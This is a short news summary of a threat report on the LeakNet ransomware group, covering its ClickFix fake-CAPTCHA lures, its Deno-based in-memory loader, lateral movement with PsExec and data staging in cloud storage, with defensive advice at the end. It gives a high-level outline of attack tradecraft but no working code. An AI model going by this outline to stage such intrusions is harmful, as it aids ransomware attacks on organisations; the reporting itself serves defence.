The LeakNet ransomware group has adopted a new attack method using ClickFix, a social engineering technique delivered through compromised websites. Instead of relying on stolen credentials, attackers trick users into running malicious commands—such as msiexec.exe—via fake CAPTCHA prompts, making the attack appear routine and harmless.

Once initial access is gained, the attack deploys a loader built on the Deno JavaScript runtime, executing payloads directly in memory. This approach minimizes disk artifacts, making detection much harder. The malware then fingerprints the system, retrieves additional payloads from external servers, and continuously executes commands in a loop.

By moving away from initial access brokers, LeakNet can operate faster and at a larger scale. The use of legitimate but compromised websites also reduces obvious network indicators, helping the attack blend into normal traffic.

After compromise, LeakNet follows a consistent playbook: loading malicious DLLs, performing lateral movement using tools like PsExec, exfiltrating data, and encrypting systems. Stolen data is often staged in cloud storage such as S3 to disguise activity as legitimate traffic.

Conclusion: the combination of ClickFix social engineering and in-memory execution via Deno makes LeakNet attacks highly stealthy. Organizations should strengthen user awareness, restrict manual command execution, and improve endpoint and network monitoring to reduce the risk.

Source: https://thehackernews.com/2026/03/leaknet-ransomware-uses-clickfix-via.html